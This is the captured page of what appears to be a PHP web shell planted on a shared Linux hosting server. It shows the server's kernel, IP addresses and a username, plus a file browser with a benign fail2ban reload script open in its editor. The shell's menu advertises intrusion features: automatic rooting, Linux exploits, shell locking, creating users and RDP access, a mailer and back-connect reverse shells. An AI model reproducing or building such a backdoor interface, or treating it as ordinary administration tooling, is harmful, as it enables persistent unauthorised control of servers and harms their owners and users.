Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
fail2ban /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
cacti
[ DIR ]
drwxr-xr-x
nagios
[ DIR ]
drwxr-xr-x
ipmasq-ZZZzzz_fail2ban.rul
1011
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ipmasq-ZZZzzz_fail2ban.rul
#! /bin/sh # # ZZZzzz|fail2ban.rul # # Ultima modifica: 20060112 <Nauta@G-B.it> Creazione # Ultima modifica: 20071205 <Nauta@G-B.it> Verifica sia in esecuzione # # Riconfigura le regole di filtraggio relative a fail2ban alla fine # dell'inizializzazione delle regole. # Solo all'avvio del sistema mostra la (ri)esecuzione dello script _NAME=fail2ban _INITSCRIPT=/etc/init.d/$_NAME _CONFIG="/etc/$_NAME/$_NAME.local /etc/$_NAME/$_NAME.conf" if [ -s $_INITSCRIPT ]; then SOCKFILE=`sed -n -e '/^[^#]*socket\s*=/{ s/.*socket\s*=\s*\(\S\+\).*/\1/p;q}' $_CONFIG 2>/dev/null` [ -z "$SOCKFILE" ] && SOCKFILE="/tmp/$_NAME.sock" if [ -S "$SOCKFILE" ]; then # Is daemon running ? if [ "$SHOWRULES" = "yes" ]; then echo "#: Reinitializing $_NAME" echo $_INITSCRIPT force-reload else [ ! $runlevel ] && HIDEOUTPUT=true fi if [ "$NOACT" != "yes" ]; then eval $_INITSCRIPT force-reload ${HIDEOUTPUT:+\>/dev/null 2\>&1} fi fi # SOCKFILE is a socket fi # _INITSCRIPT exist
Close